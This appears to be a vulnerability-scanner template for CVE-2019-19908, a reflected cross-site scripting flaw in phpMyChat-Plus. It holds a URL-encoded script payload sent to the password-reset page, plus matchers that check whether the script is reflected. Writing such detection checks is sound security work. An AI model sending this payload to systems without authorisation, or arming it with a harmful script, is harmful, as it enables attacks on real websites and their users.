21 lines
430 B
YAML
21 lines
430 B
YAML
|
id: cve-2019-19908
|
||
|
|
||
|
info:
|
||
|
name: phpMyChat-Plus XSS
|
||
|
author: madrobot
|
||
|
severity: medium
|
||
|
|
||
|
requests:
|
||
|
- method: GET
|
||
|
path:
|
||
|
- "{{BaseURL}}/plus/pass_reset.php?L=english&pmc_username=%22%3E%3Cscript%3Ealert(1337)%3C/script%3E%3C"
|
||
|
matchers-condition: and
|
||
|
matchers:
|
||
|
- type: status
|
||
|
status:
|
||
|
- 200
|
||
|
- type: word
|
||
|
words:
|
||
|
- "<script>alert(1337)</script>"
|
||
|
part: body
|